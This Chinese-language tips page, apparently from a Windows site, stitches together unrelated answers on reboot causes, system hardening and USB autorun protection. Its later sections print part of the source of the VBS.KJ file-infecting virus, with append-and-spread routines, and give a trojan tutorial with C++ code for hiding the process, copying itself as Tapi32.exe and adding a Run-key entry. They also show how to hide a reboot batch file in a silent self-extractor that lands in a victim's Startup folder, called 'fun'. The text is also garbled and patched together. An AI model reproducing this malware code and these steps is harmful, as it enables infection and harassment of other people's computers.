windows之家1.怎么制作和发送重启小病毒?
电脑为什么自动重启或者电脑自动关机是什么原因?一、软件1.病毒破坏比较典型的就是前一段时间对全球计算机造成严重破坏的“冲击波”病毒,发作时还会提示系统将在60秒后自动启动。其实,早在DOS时代就有不少病毒能够自动重启你的计算机。对于是否属于病毒破坏,我们可以使用最新版的杀毒软件进行杀毒,一般都会发现病毒存在。当然,还有一种可能是当你上网时被人恶意侵入了你的计算机,并放置了木马程序。这样对方能够从远程控制你计算机的一切活动,当然也包括让你的计算机重新启动。对于有些木马,不容易清除,最好重新安装操作系统。2.系统文件损坏当系统文件被破坏时,如Win2K下的KERNEL32.DLL,Win98下的FONTS目录下面的字体等系统运行时基本的文件被破坏,系统在启动时会因此无法完成初始化而强迫重新启动。你可以做个试验,把WIN98目录下的字库“FONTS”改名试一试。当你再次开机时,我们的计算机就会不断的重复启动。对于这种故障,因为无法进入正常的桌面,只能覆盖安装或重新安装。3.定时软件或计划任务软件起作用如果你在“计划任务栏”里设置了重新启动或加载某些工作程序时,当定时时刻到来时,计算机也会再次启动。对于这种情况,我们可以打开“启动”项,检查里面有没有自己不熟悉的执行文件或其他定时工作程序,将其屏蔽后再开机检查。当然,我们也可以在“运行”里面直接输入“Msconfig”命令选择启动项。二、硬件1.市电电压不稳解决方法:对于经常性供电不稳的地区,我们可以购置UPS电源或130-260V的宽幅开关电源来保证计算机稳定工作。2.插排或电源插座的质量差,接触不良解决方法:① 不要图省钱而购买价廉不物美的电源排插,购买一些名牌的电源插排,因为其内部都是机器自动安装压接的,没有采用手工焊接。② 对于是否属于墙壁插座内部虚接的问题,我们可以把主机换一个墙壁插座试一试,看是否存在同样的自动重启问题。3.计算机电源的功率不足或性能差解决方法:现换高质量大功率计算机电源。4.主机开关电源的市电插头松动,接触不良,没有插紧解决方法:更换优质的3C认证电源线。5.主板的电源ATX20插座有虚焊,接触不良解决方法:① 如果是主板焊点虚焊,直接用电烙铁补焊就可以了。注意:在对主板、硬盘、显卡等计算机板卡焊接时,一定要将电烙铁良好接地,或者在焊接时拔下电源插头。② 如果是电源的问题,最好是更换一台好的电源。6.CPU问题CPU内部部分功能电路损坏,二级缓存损坏时,计算机也能启动,甚至还会进入正常的桌面进行正常操作,但当进行某一特殊功能时就会重启或死机,如画表,播放VCD,玩游戏等。解决办法:试着在CMOS中屏蔽二级缓存(L2)或一级缓存(L1),看主机是否能够正常运行;再不就是直接用好的CPU进行替换排除。如果屏蔽后能够正常运行,还是可以凑合着使用,虽然速度慢些,但必竟省钱了。7.内存问题内存条上如果某个芯片不完全损坏时,很有可能会通过自检(必竟多数都设置了POST),但是在运行时就会因为内存发热量大而导致功能失效而意外重启。多数时候内存损坏时开机会报警,但内存损坏后不报警,不加电的故障都还是有的。最好使用排除法,能够快速确定故障部位。8.光驱问题如果光驱内部损坏时,也会导致主机启动缓慢或不能通过自检,也可能是在工作过程中突然重启。对于后一种情况如果是我们更换了光驱后出现的,很有可能是光驱的耗电量不同而引起的。大家需要了解的是,虽然光驱的ATPI接口相同,但不同生产厂家其引脚定义是不相同的,如果我们的硬盘线有问题时,就可能产生对某一牌子光驱使用没有问题,但对其他牌子光驱就无法工作的情况,这需要大家注意。9.RESET键质量有问题如果RESET开关损坏,内部簧片始终处于短接的位置时,主机就无法加电自检。但是当RESET开关弹性减弱或机箱上的按钮按下去不易弹起时,就会出现在使用过程中,因为偶尔的触碰机箱或者在正常使用状态下而主机突然重启。所以,当RESET开关不能按动自如时,我们一定要仔细检查,最好更换新的 RESET按钮开关或对机箱的外部按钮进行加油润滑处理。还有一种情况,是因为机箱内的RESET开关引线在焊接时绝缘层剥离过多,再加上使用过程中多次拆箱就会造成RESET开关线距离过近而引起碰撞,导致主机自动重启。10.接入网卡或并口、串口、USB接口接入外部设备时自动重
开心影院欢迎您!
2.如何制作“百毒不侵”的Windows系统呢?
1、安装系统后(包括Ghost XP),首先把所有分区都转化成NTFS格式,很重要哦。
不要说不会啊,就是单击开始按钮——>运行。输入 “convert c: /fs:ntfs”,可以把C盘转换成NTFS格式,不过要重启才能转换哦,其它盘就把C改成相应的盘符就行了。
2、在控制面板中打开“用户帐号”,将Administrator修改密码,尽量复杂些,不一定要记得。再创建一个计算机管理员用户和受限用户,管理员用户一定要密码,且也要复杂一些,这个密码要记住。
因为以后装软件,游戏要用上。当然,记不住可以在DOS下改。
3、设置好后,进入创建的计算机管理员用户,打开“我的电脑”,单击“工具”——>“文件夹选项”,点击第二个选项卡“查看”,把里面的“使用简单文件共享(推荐)”前的勾去掉。这个是以后打开文件夹或文件的属性时会出现“安全”选项卡。
4、把所有分区属性的“安全”选项卡中“users”用户去掉。 这是它默认有一个特殊权限,可以在分区下或文件夹内创建文件夹,再可以创建或保存文件,这可能给病毒可乘之机。
所以去掉。还有一个是“everyone”。
也去掉。添加创建的受限用户进去,权限是“只读”。
5、个别文件的权限问题:象QQ、游戏都需要完全权限,所以在计算机管理员用户中要给受限用户完全权限。 QQ最好把与QQ程序在一起的文件给只读权限,防止木马替换QQ及相关的DLL文件。
6、在“运行”中输入“REGEDIT”,打开注册表,把里面的[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]或[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Runonce]的权限设为只读。 防止病毒利用此处启动。
7、清理上网缓存及临时文件,上网时,一般缓存放在C:\Documents and Settings\用户名\Local Settings\Temporary Internet Files中,这也是病毒藏匿的地方,还有就是C:\Documents and Settings\用户名\Local Settings\Temp 下的临时文件。 很多程序要用到这个地方。
病毒也喜欢藏在这里,所以,在开机时,用批命令清空这两个文件夹。让病毒无处藏身。
批命令为: del C:\docume~1\用户名\Locals~1\Tempor~1\*。* del C:\Docume~1\用户名\Locals~1\Temp\*。
* 当然还可以把History和Cookies都清空。 做一个批命令文件,放到开始菜单中的“启动”项中。
这样也就做好了受限用户上网的准备工作,网上的病毒已经无法感染你的系统,也无法更改系统文件,对其它分区也无权更改,这样U盘病毒也无关紧要,因为病毒无法写入分区根目录下。 网页病毒无法更改系统文件,再凶的网页病毒也无能为力了。
3.WIN10如何增加WINdowsDefende杀毒功能?
1、该程序双击运行,一路点击下一步,然后选择你制作的介质:光盘、U盘或者ISO镜像。
2、这三种方式各有所长,不过一般来说U盘用的多一些,下面以这种方法为例进行介绍。 3、插入U盘后,在U盘选择界面确定使用哪个U盘,然后点击下一步开始制作。
4、制作分为4个步骤,主要是文件下载比较费时间,测试后发现这一下载速度很慢,而且下载的文件有227.31MB,需要等待较长时间。注意:如果你采用另外两种方式,也需要下载相同的文件,区别在于这几种方式最后对该文件处理不同:一个是写入U盘,另外是做成光盘或ISO镜像。
5、下载并且制作完毕后,就可以利用这个U盘或者光盘重启电脑,这个过程中需要选择让光盘或者U盘启动。6、启动之后就可以见到WINdows Defender熟悉的界面。
4.Win10系统下如何制作绝对安全无毒的U盘?
既然病毒是依靠改写autorun这个文件进行传播,那最最简单的方法就是在U盘上建个无法进行任何操作的autorun.inf就好了。
先把U盘插到电脑上,看看系统给它分配的是哪个盘符。然后打开命令提示符(管理员),输入md F:\autorun.infU盘里面就多出了个autorun.inf文件夹。
继续输入cd /d F:\autorun.inf进入新建的文件夹路径后,输入md 安全文件夹。\\。
OK,现在就建立好了无法被改写删除的autorun了哦。无法被删除也无法被改写,小病毒是无能为力的。
大家想要删除它的话,直接格式化就好了,简单吧?。
5.怎样制作一些基本的电脑病毒
那就看看vbs.kj的源码
Dim InWhere,HtmlText,VbsText,DegreeSign,AppleObject,FSO,WsShell,WinPath,SubE,FinalyDisk
Sub KJ_start()
\' 初始化变量
KJSetDim()
\' 初始化环境
KJCreateMilieu()
\' 感染本地或者共享上与html所在目录
KJLikeIt()
\' 通过vbs感染Outlook邮件模板
KJCreateMail()
\' 进行病毒传播
KJPropagate()
End Sub
\' 函数:KJAppendTo(FilePath,TypeStr)
\' 功能:向指定类型的指定文件追加病毒
\' 参数:
\' FilePath 指定文件路径
\' TypeStr 指定类型
Function KJAppendTo(FilePath,TypeStr)
On Error Resume Next
\' 以只读方式打开指定文件
Set ReadTemp = FSO.OpenTextFile(FilePath,1)
\' 将文件内容读入到TmpStr变量中
TmpStr = ReadTemp.ReadAll
\' 判断文件中是否存在“KJ_start()“字符串,若存在说明已经感染,退出函数;
\' 若文件长度小于1,也退出函数。
If Instr(TmpStr,“KJ_start()“) <> 0 Or Len(TmpStr) < 1 Then
ReadTemp.Close
Exit Function
End If
\' 如果传过来的类型是“htt“
\' 在文件头加上调用页面的时候加载KJ_start()函数;
\' 在文件尾追加html版本的加密病毒体。
\' 如果是“html“
\' 在文件尾追加调用页面的时候加载KJ_start()函数和html版本的病毒体;
\' 如果是“vbs“
\' 在文件尾追加vbs版本的病毒体
If TypeStr = “htt“ Then
ReadTemp.Close
Set FileTemp = FSO.OpenTextFile(FilePath,2)
FileTemp.Write “<“ & “BODY onl oad=“““ & “vbscript:“ & “KJ_start()“““ & “>“ & vbCrLf & TmpStr & vbCrLf & HtmlText
FileTemp.Close
Set FAttrib = FSO.GetFile(FilePath)
FAttrib.attributes = 34
Else
ReadTemp.Close
Set FileTemp = FSO.OpenTextFile(FilePath,8)
If TypeStr = “html“ Then
FileTemp.Write vbCrLf & “<“ & “HTML>“ & vbCrLf & “<“ & “BODY onl oad=“““ & “vbscript:“ & “KJ_start()“““ & “>“ & vbCrLf & HtmlText
ElseIf TypeStr = “vbs“ Then
FileTemp.Write vbCrLf & VbsText
End If
6.如何编写木马病毒的具体操作
木马一定是由两部分组成——服务器程序(Server)和客户端程序(Client),服务器负责打开攻击的道路,就像一个内奸特务;客户端负责攻击目标,两者需要一定的网络协议来进行通讯(一般是TCP/IP协议)。
为了让大家更好的了解木马攻击技术,破除木马的神秘感,我就来粗略讲一讲编写木马的技术并顺便编写一个例子木马,使大家能更好地防范和查杀各种已知和未知的木马。 首先是编程工具的选择。
目前流行的开发工具有C++Builder、VC、VB和Delphi,这里我们选用C++Builder(以下简称BCB);VC虽然好,但GUI设计太复杂,为了更好地突出我的例子,集中注意力在木马的基本原理上,我们选用可视化的BCB;Delphi也不错,但缺陷是不能继承已有的资源(如“死牛崇拜”黑客小组公布的BO2000源代码,是VC编写的,网上俯拾皆是);VB嘛,谈都不谈——难道你还给受害者传一个1兆多的动态链接库——Msvbvm60.dll吗? 启动C++Builder 5.0企业版,新建一个工程,添加三个VCL控件:一个是Internet页中的Server Socket,另两个是Fastnet页中的NMFTP和NMSMTP。Server Socket的功能是用来使本程序变成一个服务器程序,可以对外服务(对攻击者敞开大门)。
Socket最初是在Unix上出现的,后来微软将它引入了Windows中(包括Win98和WinNt);后两个控件的作用是用来使程序具有FTP(File Transfer Protocol文件传输协议)和SMTP(Simple Mail Transfer Protocol简单邮件传输协议)功能,大家一看都知道是使软件具有上传下载功能和发邮件功能的控件。 Form窗体是可视的,这当然是不可思议的。
不光占去了大量的空间(光一个Form就有300K之大),而且使软件可见,根本没什么作用。因此实际写木马时可以用一些技巧使程序不包含Form,就像Delphi用过程实现的小程序一般只有17K左右那样。
我们首先应该让我们的程序能够隐身。双击Form,首先在FormCreate事件中添加可使木马在Win9x的“关闭程序”对话框中隐藏的代码。
这看起来很神秘,其实说穿了不过是一种被称之为Service的后台进程,它可以运行在较高的优先级下,可以说是非常靠近系统核心的设备驱动程序中的那一种。因此,只要将我们的程序在进程数据库中用()函数注册成服务进程(Service Process)就可以了。
不过该函数的声明在Borland预先打包的头文件中没有,那么我们只好自己来声明这个位于KERNEL32.DLL中的鸟函数了。 首先判断目标机的操作系统是Win9x还是WinNt: { DWORD dwVersion = GetVersion(); // 得到操作系统的版本号 if (dwVersion >= 0x80000000) // 操作系统是Win9x,不是WinNt { typedef DWORD (CALLBACK* )(DWORD,DWORD); file://定/义()函数的原型 HINSTANCE hDLL; ; hDLL = LoadLibrary("KERNEL32"); file://加/载()函数所在的动态链接库KERNEL32.DLL = ()GetProcAddress(hDLL,""); file://得/到()函数的地址 (GetCurrentProcessId(),1); file://执/行()函数,隐藏本进程 FreeLibrary(hDLL); file://卸/载动态链接库 } } 这样就终于可以隐身了(害我敲了这么多代码!)。
为什么要判断操作系统呢?因为WinNt中的进程管理器可以对当前进程一览无余,因此没必要在WinNt下也使用以上代码(不过你可以使用其他的方法,这个留到后面再讲)。接着再将自己拷贝一份到%System%目录下,例如: C:\Windows\System,并修改注册表,以便启动时自动加载: { char TempPath[MAX_PATH]; file://定/义一个变量 GetSystemDirectory(TempPath ,MAX_PATH); file://TempPath/是system目录缓冲区的地址,MAX_PATH是缓冲区的大小,得到目标机的System目录路径 SystemPath=AnsiString(TempPath); file://格/式化TempPath字符串,使之成为能供编译器使用的样式 CopyFile(ParamStr(0).c_str(), AnsiString(SystemPath+"\\Tapi32.exe").c_str() ,FALSE); file://将/自己拷贝到%System%目录下,并改名为Tapi32.exe,伪装起来 Registry=new TRegistry; file://定/义一个TRegistry对象,准备修改注册表,这一步必不可少 Registry->RootKey=HKEY_LOCAL_MACHINE; file://设/置主键为HKEY_LOCAL_MACHINE Registry->OpenKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run",TRUE); file://打/开键值Software\\Microsoft\\Windows\\CurrentVersion\\Run,如果不存在,就创建之 try { file://如/果以下语句发生异常,跳至catch,以避免程序崩溃 if(Registry->ReadString("crossbow")!=SystemPath+"\\Tapi32.exe") Registry->WriteString("crossbow",SystemPath+"\\Tapi32.exe"); file://查/找是否有“crossbow”字样的键值,并且是否为拷贝的目录%System%+Tapi32.exe file://如/果不是,就写入以上键值和内。
7.怎样制作一个小病毒
右键--新建快捷方式--项目地址 %windir%\system32\shutdown.exe -s -t 0 下一步保存就行了这是自动关机的,最后的0是关机延时你可以改成50或10
还有一种,网上刚找,原理差不多,但比我那个高级:
新建一个文本文档,在其中输入“shutdown -r -t 30”(不包含双引号)然后保存为扩展名为.bat的文件。
一旦运行这个文件桌面就会弹出一个倒计时30秒重启的对话框。我们还可以再修改一下,把“-r”改成“-s”(不包含双引号)这样在运行后就只是关机而不重启。注意:其中的30是关机或重启的倒计时时间,你可以随便改。
我们还可以再进行加工,就是让它在每次开机时自动运行,步骤如下:
步骤1、右击这个文件,在弹出的快捷菜单中选择“添加到压缩文件”。
步骤2、双击打开这个压缩文件,工具栏中选择“自解压格式”。
步骤3、在出现的自解压设置中点击“高级自解压选项”,然后在解压后运行中输入刚才保存的那个文件名,在解压路径输入:C:\Documents and Settings\Administrator\[开始] 菜单\程序\启动”。
步骤4、在模式中的安静模式选择“全部隐藏”。最后点击确定即可生成一个自解压文件。
这样我在运行这个自解压文件时就会自动运行那个病毒文件,并将其解压到启动文件夹中,让其在每次开机时都运行。对方在运行我们制作的病毒后他的电脑就会不间断的重启,是不是很好玩呀!
要想不重启只要在dos下输入“shutdown -a”回车,然后再把启动文件夹中的病毒删除即可。
转载请注明出处windows之家 » win10如何制作病毒